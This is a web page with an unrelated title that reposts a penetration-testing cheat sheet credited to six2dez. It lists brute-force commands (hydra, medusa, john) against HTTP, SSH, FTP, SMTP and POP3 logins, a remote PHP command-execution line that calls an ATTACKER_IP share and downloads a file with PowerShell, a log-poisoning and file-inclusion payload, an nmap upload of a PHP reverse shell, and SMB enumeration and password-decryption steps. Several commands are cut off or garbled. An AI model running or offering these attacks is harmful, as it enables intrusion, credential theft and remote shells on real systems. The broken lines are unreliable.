Windows grep software github
12/7/2023

```
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!"
hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V
hydra -P /usr/share/wordlists/nmap.lst 10.11.1.111 smtp -V
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 10.11.1.111 pop3 -V
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 10.11.1.111 ftp -V
hydra -l root -P password-file.txt 10.11.1.111 ssh
medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color
\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "" -OutFile "C:\\windows\\system32\\spool\\drivers\\color
# Access it via browser (2 request attack):
# Start SMB Server in attacker machine and put evil script

# Contaminating log
nc -v 10.11.1.111 80
10.11.1.111: inverse host lookup failed: Unknown host

?page=php://filter/convert.base64-encode/resource=./config.php

# Simple curl POST request with login data
curl -X POST -d 'username=centreon&password=wall'

D -m http -h 10.11.1.111 -M GET -o unix

nmap -p 80 192.168.1.124 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php'

# WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users)

smbmap -u victim -p s3cr3t -H 10.11.1.111
# Inside \Policies\\MACHINE\Preferences\Groups\Groups.xml are the username and the password, which can be decrypted with "gpp-decrypt "

cms-explorer -url -type

nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111
nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111
```

Windows create SMB Server transfer files.

I decided to archive here for my own use and modification.

Big shout out to six2dez for putting this list together. I began working on something similar myself involving Excel, until I came into this little gem.